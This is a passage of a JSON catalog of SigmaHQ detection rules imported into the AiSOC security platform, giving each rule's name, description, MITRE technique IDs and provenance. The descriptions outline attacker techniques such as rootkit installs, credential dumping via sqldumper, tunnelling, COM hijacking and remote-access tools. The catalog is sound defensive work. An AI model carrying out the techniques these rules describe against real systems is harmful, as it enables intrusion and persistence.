"sigmahq-sigma-222129f7-f4dc-4568-b0d2-22440a9639ba", "type": "detection", "name": "Cloudflared Quick Tunnel Execution", "description": "Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\nThe free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\nThe tool has been observed in use by threat groups including Akira ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-quick-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "222129f7-f4dc-4568-b0d2-22440a9639ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml" } }, { "id": "sigmahq-sigma-22236d75-d5a0-4287-bf06-c93b1770860f", "type": "detection", "name": "Triple Cross eBPF Rootkit Install Commands", "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-install-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22236d75-d5a0-4287-bf06-c93b1770860f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" } }, { "id": "sigmahq-sigma-222720a7-047f-4054-baa5-bab9be757db0", "type": "detection", "name": "PowerShell MSI Install via WindowsInstaller COM From Remote Location", "description": "Detects the execution of PowerShell commands that attempt to install MSI packages via the\nWindows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.\nThis could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.\nAnd the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-msi-install-via-windowsinstaller-com-from-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "222720a7-047f-4054-baa5-bab9be757db0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml" } }, { "id": "sigmahq-sigma-224f140f-3553-4cd1-af78-13d81bf9f7cc", "type": "detection", "name": "Potential RDP Session Hijacking Activity", "description": "Detects potential RDP Session Hijacking activity on Windows systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-session-hijacking-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml" } }, { "id": "sigmahq-sigma-225274c4-8dd1-40db-9e09-71dff4f6fb3c", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-4.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "225274c4-8dd1-40db-9e09-71dff4f6fb3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml" } }, { "id": "sigmahq-sigma-225d8b09-e714-479c-a0e4-55e6f29adf35", "type": "detection", "name": "Azure Kubernetes Events Deleted", "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-events-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "225d8b09-e714-479c-a0e4-55e6f29adf35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml" } }, { "id": "sigmahq-sigma-2267fe65-0681-42ad-9a6d-46553d3f3480", "type": "detection", "name": "WSL Child Process Anomaly", "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wsl-child-process-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" } }, { "id": "sigmahq-sigma-22777c9e-873a-4b49-855f-6072ab861a52", "type": "detection", "name": "OpenCanary - SMB File Open Request", "description": "Detects instances where an SMB service on an OpenCanary node has had a file open request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-smb-file-open-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22777c9e-873a-4b49-855f-6072ab861a52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_smb_file_open.yml" } }, { "id": "sigmahq-sigma-22c45af6-f590-4d44-bab3-b5b2d2a2b6d9", "type": "detection", "name": "Remote Access Tool - Potential MeshAgent Execution - MacOS", "description": "Detects potential execution of MeshAgent which is a tool used for remote access.\nHistorical data shows that threat actors rename MeshAgent binary to evade detection.\nMatching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-potential-meshagent-execution-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22c45af6-f590-4d44-bab3-b5b2d2a2b6d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml" } }, { "id": "sigmahq-sigma-22d80745-6f2c-46da-826b-77adaededd74", "type": "detection", "name": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-dacl-modification-via-set-service-cmdlet-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22d80745-6f2c-46da-826b-77adaededd74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" } }, { "id": "sigmahq-sigma-22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "type": "detection", "name": "Base64 MZ Header In CommandLine", "description": "Detects encoded base64 MZ header in the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/base64-mz-header-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml" } }, { "id": "sigmahq-sigma-22f2fb54-5312-435d-852f-7c74f81684ca", "type": "detection", "name": "Google Workspace Application Access Level Modified", "description": "Detects when an access level is changed for a Google workspace application.\nAn access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\nAn adversary would be able to remove access levels to gain easier access to Google workspace resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-application-access-level-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22f2fb54-5312-435d-852f-7c74f81684ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_application_access_levels_modified.yml" } }, { "id": "sigmahq-sigma-2316929c-01aa-438c-970f-099145ab1ee6", "type": "detection", "name": "JAMF MDM Potential Suspicious Child Process", "description": "Detects potential suspicious child processes of \"jamf\". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jamf-mdm-potential-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2316929c-01aa-438c-970f-099145ab1ee6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" } }, { "id": "sigmahq-sigma-234dc5df-40b5-49d1-bf53-0d44ce778eca", "type": "detection", "name": "Payload Decoded and Decrypted via Built-in Utilities", "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1204", "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/payload-decoded-and-decrypted-via-built-in-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" } }, { "id": "sigmahq-sigma-234f9f48-904b-4736-a34c-55d23919e4b7", "type": "detection", "name": "Google Cloud Re-identifies Sensitive Information", "description": "Identifies when sensitive information is re-identified in google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-re-identifies-sensitive-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "234f9f48-904b-4736-a34c-55d23919e4b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml" } }, { "id": "sigmahq-sigma-23590215-4702-4a70-8805-8dc9e58314a2", "type": "detection", "name": "Registry-Free Process Scope COR_PROFILER", "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-free-process-scope-cor-profiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23590215-4702-4a70-8805-8dc9e58314a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" } }, { "id": "sigmahq-sigma-236d8e89-ed95-4789-a982-36f4643738ba", "type": "detection", "name": "Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script", "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-persistence-via-vmwaretoolboxcmd-exe-vm-state-change-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "236d8e89-ed95-4789-a982-36f4643738ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml" } }, { "id": "sigmahq-sigma-238527ad-3c2c-4e4f-a1f6-92fd63adb864", "type": "detection", "name": "Antivirus Exploitation Framework Detection", "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1203", "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-exploitation-framework-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_exploiting.yml" } }, { "id": "sigmahq-sigma-23b71bc5-953e-4971-be4c-c896cda73fc2", "type": "detection", "name": "Sysmon Blocked Executable", "description": "Triggers on any Sysmon \"FileBlockExecutable\" event, which indicates a violation of the configured block policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-blocked-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23b71bc5-953e-4971-be4c-c896cda73fc2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_block_executable.yml" } }, { "id": "sigmahq-sigma-23c43900-e732-45a4-8354-63e4a6c187ce", "type": "detection", "name": "MacOS Emond Launch Daemon", "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-emond-launch-daemon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23c43900-e732-45a4-8354-63e4a6c187ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" } }, { "id": "sigmahq-sigma-23ceaf5c-b6f1-4a32-8559-f2ff734be516", "type": "detection", "name": "Dumping Process via Sqldumper.exe", "description": "Detects process dump via legitimate sqldumper.exe binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumping-process-via-sqldumper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" } }, { "id": "sigmahq-sigma-241e802a-b65e-484f-88cd-c2dc10f9206d", "type": "detection", "name": "Read Contents From Stdin Via Cmd.EXE", "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/read-contents-from-stdin-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml" } }, { "id": "sigmahq-sigma-242301bc-f92f-4476-8718-78004a6efd9f", "type": "detection", "name": "DLL Loaded via CertOC.EXE", "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-loaded-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "242301bc-f92f-4476-8718-78004a6efd9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" } }, { "id": "sigmahq-sigma-243380fa-11eb-4141-af92-e14925e77c1b", "type": "detection", "name": "Potential PSFactoryBuffer COM Hijacking", "description": "Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-psfactorybuffer-com-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "243380fa-11eb-4141-af92-e14925e77c1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml" } }, { "id": "sigmahq-sigma-2433a154-bb3d-42e4-86c3-a26bdac91c45", "type": "detection", "name": "Renamed PingCastle Binary Execution", "description": "Detects the execution of a renamed \"PingCastle\" binary based on the PE metadata fields.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-pingcastle-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2433a154-bb3d-42e4-86c3-a26bdac91c45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml" } }, { "id": "sigmahq-sigma-24357373-078f-44ed-9ac4-6d334a668a11", "type": "detection", "name": "Direct Autorun Keys Modification", "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/direct-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24357373-078f-44ed-9ac4-6d334a668a11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml" } }, { "id": "sigmahq-sigma-243de76f-4725-4f2e-8225-a8a69b15ad61", "type": "detection", "name": "PowerShell Create Local User", "description": "Detects creation of a local user via PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-create-local-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" } }, { "id": "sigmahq-sigma-24549159-ac1b-479c-8175-d42aea947cae", "type": "detection", "name": "Hacktool Ruler", "description": "This events that are generated when using the hacktool Ruler by Sensepost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1114", "T1059", "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-ruler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24549159-ac1b-479c-8175-d42aea947cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_ruler.yml" } }, { "id": "sigmahq-sigma-248649b7-d64f-46f0-9fb2-a52774166fb5", "type": "detection", "name": "Application Using Device Code Authentication Flow", "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-using-device-code-authentication-flow.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "248649b7-d64f-46f0-9fb2-a52774166fb5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml" } }, { "id": "sigmahq-sigma-24b6cf51-6122-469e-861a-22974e9c1e5b", "type": "detection", "name": "Potential SmadHook.DLL Sideloading", "description": "Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-smadhook-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24b6cf51-6122-469e-861a-22974e9c1e5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 